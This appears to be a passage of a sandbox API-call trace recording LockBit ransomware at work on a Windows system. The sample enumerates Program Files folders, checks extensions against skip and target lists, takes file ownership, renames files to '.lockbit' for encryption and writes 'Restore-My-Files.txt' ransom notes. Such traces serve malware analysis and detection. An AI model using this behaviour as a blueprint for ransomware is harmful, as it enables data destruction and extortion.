[0081.992] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0081.992] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0081.992] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0081.992] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0081.992] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0081.992] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0081.992] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0081.992] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0081.992] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0081.992] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0081.992] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0081.992] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0081.992] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0081.993] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0081.993] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0081.993] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0081.993] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0081.993] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0081.993] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0081.993] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0081.993] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0081.993] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0081.993] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0081.993] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0081.993] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0081.993] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.lockbit") returned 82 [0081.993] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.993] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.lockbit")) returned 0 [0081.993] GetLastError () returned 0x5 [0081.994] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0081.994] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0081.994] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.994] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0081.994] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0081.994] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3c4, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0081.995] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0081.995] NtQueryInformationFile (in: FileHandle=0x3c4, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0082.010] NtClose (Handle=0x3c4) returned 0x0 [0082.010] RtlFreeAnsiString (AnsiString="\\") [0082.010] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3c4) returned 1 [0082.010] malloc (_Size=0x200) returned 0x53fcc0 [0082.010] GetTokenInformation (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0082.010] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0082.010] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0082.010] CloseHandle (hObject=0x3c4) returned 1 [0082.010] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0082.011] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0082.011] free (_Block=0x53fcc0) [0082.011] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0082.011] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.lockbit")) returned 1 [0082.012] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0082.012] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0082.012] malloc (_Size=0x40068) returned 0x206b860 [0082.012] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=38485) returned 1 [0082.012] ReadFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0082.024] GetLastError () returned 0x3e5 [0082.024] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned 1 [0082.024] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Restore-My-Files.txt") returned 86 [0082.024] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.024] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="numbers", cAlternateFileName="")) returned 1 [0082.024] lstrcmpiW (lpString1=".", lpString2="numbers") returned -1 [0082.024] lstrcmpiW (lpString1="..", lpString2="numbers") returned -1 [0082.024] lstrcmpiW (lpString1="numbers", lpString2="$windows.~bt") returned 1 [0082.024] lstrcmpiW (lpString1="numbers", lpString2="intel") returned 1 [0082.025] lstrcmpiW (lpString1="numbers", lpString2="msocache") returned 1 [0082.025] lstrcmpiW (lpString1="numbers", lpString2="$recycle.bin") returned 1 [0082.029] lstrcmpiW (lpString1="numbers", lpString2="$windows.~ws") returned 1 [0082.029] lstrcmpiW (lpString1="numbers", lpString2="tor browser") returned -1 [0082.029] lstrcmpiW (lpString1="numbers", lpString2="boot") returned 1 [0082.029] lstrcmpiW (lpString1="numbers", lpString2="system volume information") returned -1 [0082.029] lstrcmpiW (lpString1="numbers", lpString2="perflogs") returned -1 [0082.029] lstrcmpiW (lpString1="numbers", lpString2="google") returned 1 [0082.029] lstrcmpiW (lpString1="numbers", lpString2="application data") returned 1 [0082.030] lstrcmpiW (lpString1="numbers", lpString2="windows") returned -1 [0082.030] lstrcmpiW (lpString1="numbers", lpString2="windows.old") returned -1 [0082.030] lstrcmpiW (lpString1="numbers", lpString2="appdata") returned 1 [0082.030] lstrcmpiW (lpString1="numbers", lpString2="Windows nt") returned -1 [0082.030] lstrcmpiW (lpString1="numbers", lpString2="Msbuild") returned 1 [0082.030] lstrcmpiW (lpString1="numbers", lpString2="Microsoft") returned 1 [0082.030] lstrcmpiW (lpString1="numbers", lpString2="All users") returned 1 [0082.030] lstrcmpiW (lpString1="numbers", lpString2="mozilla") returned 1 [0082.030] wsprintfW (in: param_1=0x344ca60, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers") returned 73 [0082.030] wsprintfW (in: param_1=0x344c2c0, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*") returned 75 [0082.030] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\*"), fInfoLevelId=0x0, lpFindFileData=0x344c7a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344c7a8) returned 0x2e32d0 [0082.030] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.030] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0082.030] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0082.031] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.031] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7e6a73, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f7e6a73, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7e6a73, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4c2, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="numbase.xml", cAlternateFileName="")) returned 1 [0082.031] lstrcmpiW (lpString1=".", lpString2="numbase.xml") returned -1 [0082.031] lstrcmpiW (lpString1="..", lpString2="numbase.xml") returned -1 [0082.031] PathFindExtensionW (pszPath="numbase.xml") returned=".xml" [0082.031] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0082.031] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0082.032] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0082.032] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0082.033] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="numbase.xml") returned 1 [0082.033] lstrcmpiW (lpString1="ntldr", lpString2="numbase.xml") returned -1 [0082.033] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="numbase.xml") returned -1 [0082.033] lstrcmpiW (lpString1="bootsect.bak", lpString2="numbase.xml") returned -1 [0082.033] lstrcmpiW (lpString1="autorun.inf", lpString2="numbase.xml") returned -1 [0082.033] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\") returned="" [0082.033] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml") returned=".xml" [0082.033] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0082.033] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0082.033] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0082.033] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0082.033] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0082.033] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0082.033] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0082.033] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0082.033] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0082.033] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0082.033] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0082.033] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0082.033] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0082.033] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0082.033] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0082.033] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0082.033] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0082.033] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0082.033] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0082.033] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0082.034] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0082.034] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0082.034] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0082.034] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0082.034] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0082.034] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0082.034] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0082.034] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0082.034] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.lockbit") returned 93 [0082.034] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0082.034] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml.lockbit")) returned 0 [0082.034] GetLastError () returned 0x5 [0082.035] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0082.035] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0082.035] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.035] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0082.035] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0082.035] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3c0, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0082.036] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0082.036] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0082.733] NtClose (Handle=0x3c0) returned 0x0 [0082.733] RtlFreeAnsiString (AnsiString="\\") [0082.734] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3c0) returned 1 [0082.734] malloc (_Size=0x200) returned 0x53fcc0 [0082.734] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0082.734] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0082.734] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0082.734] CloseHandle (hObject=0x3c0) returned 1 [0082.734] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0082.734] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0082.735] free (_Block=0x53fcc0) [0082.735] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0082.735] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml.lockbit")) returned 1 [0082.736] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0082.736] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0082.736] malloc (_Size=0x40068) returned 0x206b860 [0082.736] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=1218) returned 1 [0082.736] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0082.745] GetLastError () returned 0x3e5 [0082.745] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers") returned 1 [0082.745] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\Restore-My-Files.txt") returned 94 [0082.745] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0082.746] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0082.746] malloc (_Size=0x40068) returned 0x206b860 [0082.746] WriteFile (in: hFile=0x3c0, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0082.759] GetLastError () returned 0x3e5 [0082.759] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7e6a73, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f7e6a73, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7e6a73, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4c2, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="numbase.xml", cAlternateFileName="")) returned 0 [0082.760] GetLastError () returned 0x12 [0082.760] FindClose (in: hFindFile=0x2e32d0 | out: hFindFile=0x2e32d0) returned 1 [0082.760] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f79a7b7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f79a7b7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7c0915, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd1, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="numbers.xml", cAlternateFileName="")) returned 1 [0082.760] lstrcmpiW (lpString1=".", lpString2="numbers.xml") returned -1 [0082.760] lstrcmpiW (lpString1="..", lpString2="numbers.xml") returned -1 [0082.760] PathFindExtensionW (pszPath="numbers.xml") returned=".xml" [0082.760] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0082.760] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0082.760] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0082.760] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0082.760] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0082.760] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0082.760] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0082.760] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0082.760] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0082.760] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0082.760] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0082.760] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0082.760] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0082.760] lstrcmpiW 